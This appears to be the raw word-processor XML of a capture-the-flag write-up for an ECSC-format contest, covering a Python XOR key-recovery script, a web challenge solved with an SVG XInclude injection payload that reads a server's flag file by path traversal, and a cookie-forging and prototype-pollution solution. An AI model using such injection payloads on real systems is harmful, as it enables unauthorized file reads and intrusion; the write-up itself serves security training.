            <wp:docPr id="169684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403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017" w14:textId="77777777" w:rsidR="00277289" w:rsidRPr="00A81F26" w:rsidRDefault="00277289" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54A09C10" w14:textId="0F336FDC" w:rsidR="00C05876" w:rsidRDefault="00634119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6" w:name="_Toc203244074"/>
      <w:r w:rsidRPr="00634119">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Just a Key</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w14:paraId="7DA575DF" w14:textId="4B9F873B" w:rsidR="00A81F26" w:rsidRPr="00A81F26" w:rsidRDefault="00A81F26" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solve script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483FAF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1.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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164009B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2.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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C14A2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3.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Script to solve the "</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Just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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Key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 reverse engineering challenge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F45CAF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4.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This script attempts to recover the key by analyzing the XOR operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13889D6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5.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"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0A73C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B091F9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7.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bytes_to_int_array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80EC76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"""Convert bytes to array of integers"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A041CB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 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b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4ACFA7E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1B69EF17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11.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int_array_to_bytes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4A05FD7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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 12.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"""Convert array of integers to bytes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DA0D08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bytes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data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232D25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52BBEC5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15.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xor_decrypt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E66507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 xml:space="preserve">"""Perform XOR decryption </w:t>
      </w:r>
      <w:proofErr w:type="gram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similar to</w:t>
      </w:r>
      <w:proofErr w:type="gram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FUN_00101189"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0629F26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not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244EEA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''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983331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19.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94CA1D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result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4BE9D23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432F77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124BE4B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)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04916C6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%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59F8D9A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AC1B507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bytes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44AA89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2F322A3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28.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solve_challenge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():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289F11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29.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"""Main function to solve the challenge"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F213C1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11ECD99D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Extract the encrypted data from the decompiled code (little-endian format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4665114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Convert hex values to bytes in little-endian order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E55E32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hex_val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size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2FF85F1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hex_val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to_bytes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size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'little'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665660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5B07DE8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Stage 1 data from local_258, local_250, local_248, local_240, local_238</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EFCB0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encrypted_stage1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</w:p>
    <w:p w14:paraId="254CFFB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0x59e9ba9e8f463d01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15FC164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39.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0x5b94c9ea56cfff4f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02F098F7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0xc1129b387f683e5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6328DB0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0xc19d94e581d7e07a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316858B8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0x2d2e57e4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4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B2050E8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1CC816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D8C9A2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Stage 2 data from local_228, local_220, local_218, local_210, local_208</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26023591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encrypted_stage2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</w:p>
    <w:p w14:paraId="3DCDB10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0x4e9ef0d5ea375c64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170D199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0x48e7dea62bdb901d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6C9C34C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49.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0x5a4654dee5b1d698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3FA0F46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0x8d8e95f2979d8315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</w:p>
    <w:p w14:paraId="1CCE06D7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hex_to_bytes_le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0x703f1481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4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6E928A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9C900C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F30C7E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Attempting to recover the key..."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D711C4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Stage 1 encrypted data length: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(encrypted_stage1)}"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7563D8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Stage 2 encrypted data length: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(encrypted_stage2)}"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282982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71376D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Try common flag prefixes (focusing on ECSC format)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3072D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59.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common_prefixes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"ECSC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{"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"ecsc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{"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24F7007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32DAD5FD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prefix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common_prefixes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0501A3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"\n[*] Trying prefix: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prefix.decode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()}"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C095DA8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3E5AD50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Try different key lengths (minimum 5 as per the code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DABC6C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21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01F4F06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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 66.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Trying key length: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CB820F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2ED4C93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Try to find a key that produces the expected prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34384A01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69.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We'll try a brute force approach for short keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7BC7F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&lt;=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8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1DB3A3D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For short keys, try common patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA0C5F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test_keys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</w:p>
    <w:p w14:paraId="25D79FA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"hello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"a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</w:p>
    <w:p w14:paraId="5C14740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"password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[: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],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B315E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"12345"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"a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</w:p>
    <w:p w14:paraId="4C5BA94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"admin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"a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</w:p>
    <w:p w14:paraId="73795C9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"key12"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"a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</w:p>
    <w:p w14:paraId="11E1B9E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"test1"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+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"a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-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</w:p>
    <w:p w14:paraId="1BA519C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79.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27D99DE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</w:p>
    <w:p w14:paraId="628ADDB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test_keys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4687D91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!=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key_length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37A5CD1D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continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA962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</w:p>
    <w:p w14:paraId="071FD82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First decrypt stage 1 with the test key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB3EC4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stage1_result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xor_decrypt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encrypted_stage1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07BCAF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</w:p>
    <w:p w14:paraId="58262CB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Then decrypt stage 2 with stage 1 result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8D366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89.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final_result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xor_decrypt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encrypted_stage2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stage1_result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36BE3E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</w:p>
    <w:p w14:paraId="5D14003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Check if result starts with expected prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635A421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final_result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startswith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prefix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18A7021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"[+] FOUND POTENTIAL KEY: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A08F97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"[+] Decrypted flag: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final_result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557F9E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final_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3B1B671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54FACF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If simple brute force doesn't work, try reverse engineering approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB22A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 xml:space="preserve">"\n[*] Simple brute force failed. Trying </w:t>
      </w:r>
      <w:proofErr w:type="gram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reverse</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve"> engineering approach..."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C5D068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 99.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27CF78B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Assume the flag starts with "ECSC{" and try to work backwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5746B1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target_prefix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"ECSC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{"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783FED4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477FD6F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Try to find what stage1_result should be to produce </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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target_prefix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0E660DC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16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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C766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Reverse engineering with key length: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key_len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0C6E35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790D95E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Calculate what the stage1 result should start with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193C38A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stage1_prefix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3655221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109.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min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target_prefix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encrypted_stage2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))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B090578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stage1_prefix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encrypted_stage2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target_prefix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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2423D33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0D6BB4BD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stage1_prefix_bytes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bytes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stage1_prefix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801678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Stage1 result should start with: {stage1_prefix_bytes.hex()}"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8ECF6E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5C93F41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Now try to find what key produces this stage1_prefix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748C8F0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key_candidate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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F59023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lastRenderedPageBreak/>
        <w:t xml:space="preserve">117.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for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range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min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stage1_prefix_bytes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encrypted_stage1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))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B815F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key_byte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encrypted_stage1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^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stage1_prefix_bytes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[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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452F477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119.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key_candidate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key_byte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1D6B7C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</w:p>
    <w:p w14:paraId="6554B1D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key_candidate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&gt;=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5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D387F6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 xml:space="preserve"># Extend </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 xml:space="preserve"> to full length by repeating pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7D09A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full_key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key_candidate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key_len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 xml:space="preserve">// </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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key_candidate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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)) + 1))[:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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key_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E941F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bytes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full_key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D93530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57E602C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Testing key candidate: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E0532B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187810B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Test this key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51271693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129.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stage1_result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xor_decrypt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encrypted_stage1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399DF2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final_result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xor_decrypt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encrypted_stage2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stage1_result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1133F5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7A7130A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"[*] Result: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final_result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364B79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</w:p>
    <w:p w14:paraId="29E4AB06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880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Check if it looks like a valid flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4481C65E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"ECSC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{"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final_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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or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"ecsc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{"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final_result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41A3DF0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"[+] FOUND KEY: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6B042C5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"[+] FLAG: {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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final_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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2FE6BF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test_key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final_result</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25819C6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139.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78591C9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"[-] Could not find the key automatically"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0DA9ACA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return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None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41519C0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</w:p>
    <w:p w14:paraId="72DC4B3A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143.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__name__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"__main__"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83EEC3B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"="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60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70F94628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"Key Recovery Script for 'Just a Key' Challenge - ECSC Format"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6056B9D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146.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"="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81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>60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8FE1BE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147.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7818421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148.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key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flag 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solve_challenge</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB6883C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149.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14:paraId="0B9519A7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150.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if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key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7205C374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151.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"\n[SUCCESS] Key found: {key}"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62282449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152.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"[SUCCESS] Flag: {flag}"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3904FB2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153.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else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</w:p>
    <w:p w14:paraId="0F230F70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154.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"\n[FAILED] Could not automatically recover the key"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F13E51F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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">155. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81F2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A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>print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A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"You may need to analyze the binary further or try manual key recovery"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A81F26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4949C142" w14:textId="77777777" w:rsidR="00A81F26" w:rsidRPr="00A81F26" w:rsidRDefault="00A81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417029"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">156. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E9A7C" w14:textId="77777777" w:rsidR="00A81F26" w:rsidRDefault="00A81F26" w:rsidP="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16D91901" w14:textId="0294FDD5" w:rsidR="00A81F26" w:rsidRPr="0071588B" w:rsidRDefault="00A81F26">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A81F26">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6797DDAC" wp14:editId="05C0E398">
            <wp:extent cx="3911600" cy="1709029"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="122608753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87536" name="Picture 1" descr="A computer screen shot of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8560" cy="17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49DA" w14:textId="7A4DD45E" w:rsidR="0018145A" w:rsidRDefault="00C05876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27" w:name="_Toc203244075"/>
      <w:r w:rsidRPr="00C05876">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="10776FEB" w14:textId="77777777" w:rsidR="00BB4E17" w:rsidRPr="00BB4E17" w:rsidRDefault="00BB4E17" w:rsidP="00BB4E17">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7CD6C9" w14:textId="16633BAE" w:rsidR="0018145A" w:rsidRDefault="0042502E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8" w:name="_Toc203244076"/>
      <w:r w:rsidRPr="0042502E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Memes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="73AEE419" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C20">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After checking the given source code, I found that the payload should be in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>topText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tried</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> various payloads such as images, documents </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and path traversal and the only payload that worked was this, which I sent using curl command as a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>payload.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17717D42" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20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7DF0F49" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C2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"name"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20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CD0C2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"doge"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20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435A5A35" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C2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topText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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CD0C20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CD0C2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 xml:space="preserve">"&lt;/text&gt;&lt;text x=\"10\" y=\"50\" font-size=\"20\" fill=\"black\" </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xmlns:xi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">=\"http://www.w3.org/2001/XInclude\"&gt;&lt;xi:include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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=\".?../../../../app/flag.txt\" parse</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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=\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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"text\"/&gt;&lt;/text&gt;&lt;text&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C43724D" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C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en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C2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</w:t>
      </w:r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bottomText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20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CD0C2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CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4284E604" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="00CD0C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  <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0C20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3B7752C0" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="002F7D37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5582ECF2" w14:textId="5CF80B92" w:rsidR="00CD0C20" w:rsidRPr="00CD0C20" w:rsidRDefault="00CD0C20" w:rsidP="002F7D37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0C20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After getting the image in the response, download and view it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17702B16" w14:textId="77777777" w:rsidR="00CD0C20" w:rsidRPr="002F7D37" w:rsidRDefault="00CD0C20" w:rsidP="002F7D37">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B448916" w14:textId="1D81B27C" w:rsidR="00C05876" w:rsidRDefault="0042502E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9" w:name="_Toc203244077"/>
      <w:r w:rsidRPr="0042502E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Missing Essence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="54C2E0F6" w14:textId="3D8461FB" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a new cookie using these:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61523F15" w14:textId="00EEA809" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1E57">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB11977" wp14:editId="07704017">
            <wp:extent cx="5274310" cy="2252980"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3788054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5420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D50" w14:textId="3528C6D0" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Then tried prototype pollution like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146863D3" w14:textId="1C2F23F5" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1E57">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57832812" wp14:editId="7AE12AB8">
            <wp:extent cx="5274310" cy="1404620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="619078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7860" name="Picture 1" descr="A screen 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945" w14:textId="7A0EABE9" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>After that I did curl using the cookie created:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5637459C" w14:textId="42742352" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1E57">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7BC74B" wp14:editId="13F22A46">
            <wp:extent cx="5274310" cy="378460"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="56631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191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F58" w14:textId="47065EF7" w:rsidR="00CC1E57" w:rsidRDefault="00CC1E57" w:rsidP="00CC1E57">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>And found the flag in the response:</w:t>
      </w:r>
    </w:p>
